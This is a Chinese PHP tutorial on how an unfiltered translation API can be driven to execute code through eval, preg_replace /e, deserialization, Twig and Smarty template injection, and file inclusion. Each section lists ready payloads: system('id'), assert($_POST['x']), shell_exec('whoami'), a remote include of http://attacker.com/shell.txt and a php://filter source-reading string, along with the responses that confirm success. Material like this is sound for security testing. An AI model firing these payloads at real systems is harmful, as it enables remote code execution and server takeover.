翻译接口若未严格过滤用户输入,可能因eval函数、preg_replace的/e修饰符、反序列化、模板引擎注入及文件包含五种方式触发PHP代码执行。
如果翻译接口未对用户输入进行严格过滤,攻击者可能通过构造恶意参数使后端PHP代码被意外执行。以下是几种常见的触发方式:
一、利用eval函数动态执行字符串
当翻译接口接收用户提交的文本后,直接将其拼接到eval()函数中执行,会导致任意PHP代码运行。该函数会将传入的字符串作为PHP代码解析并执行,缺乏输入校验时风险极高。
1、向翻译接口的text参数提交类似"); system('id'); //的payload,尝试闭合原有语句结构。
2、若接口使用双引号拼接字符串且未转义,可尝试注入<?php phpinfo(); ?>并确认响应中是否包含PHP信息输出。
立即学习“PHP免费学习笔记(深入)”;
3、检查响应体是否返回命令执行结果或PHP错误信息,例如显示uid=33(www-data)或Fatal error: Call to undefined function等线索。
二、通过preg_replace的/e修饰符执行代码
在旧版本PHP(5.4.0之前)中,preg_replace函数支持/e修饰符,允许将匹配结果作为PHP代码执行。若翻译接口使用该函数处理用户输入的正则替换逻辑,则存在直接代码执行漏洞。
1、向接口发送包含正则表达式语法的请求,例如text参数设为{${system(id)}}。
2、尝试构造如xxx/e形式的pattern参数(若接口暴露该字段),配合replacement参数填入assert($_POST['x'])类内容。
3、观察HTTP响应状态码是否变为500,或响应正文是否出现uid=33(www-data) groups=33(www-data)等系统命令回显。
三、借助反序列化触发__destruct或__wakeup方法调用
若翻译接口接收并反序列化用户可控的字符串(如JSON或PHP序列化数据),且其中包含危险魔术方法调用链,则可在对象销毁或唤醒时触发PHP代码执行。
1、识别接口是否接受serialize()格式数据,例如请求体含O:8:"Language":1:{s:4:"text";s:6:"hello";}结构。
2、构造带有恶意__destruct()方法的序列化对象,使其中调用system('ls -la')等函数。
3、Base64编码该序列化字符串后作为参数提交,检查响应中是否出现index.php config.php vendor/等目录列表内容。
四、利用模板引擎注入执行PHP代码
部分翻译接口采用模板引擎(如Smarty、Twig)渲染返回内容,若用户输入未经沙箱隔离即进入模板上下文,可能导致模板语法被执行,进而调用PHP函数。
1、向text参数提交Twig模板语法:{{`id`|filter('system')}},观察是否执行系统命令。
2、尝试Smarty语法:{php}echo shell_exec('whoami');{/php},确认是否绕过禁用标签限制。
3、若响应中出现www-data或Parse error: syntax error,说明模板引擎已解析并尝试执行PHP代码。
五、通过文件包含函数加载远程或本地恶意PHP文件
当翻译接口使用include、require、include_once等函数动态加载语言包或配置文件,且文件路径由用户控制时,可能引发远程文件包含(RFI)或本地文件包含(LFI)继而执行PHP代码。
1、将text参数设为http://attacker.com/shell.txt?,测试是否触发远程HTTP请求并执行响应内容。
2、尝试LFI结合php://filter协议读取源码:php://filter/read=convert.base64-encode/resource=index.php,解码后查找危险函数调用点。
3、若响应返回Base64编码内容,解码后发现eval($_POST['cmd']);等敏感代码,则确认存在可利用的包含路径。
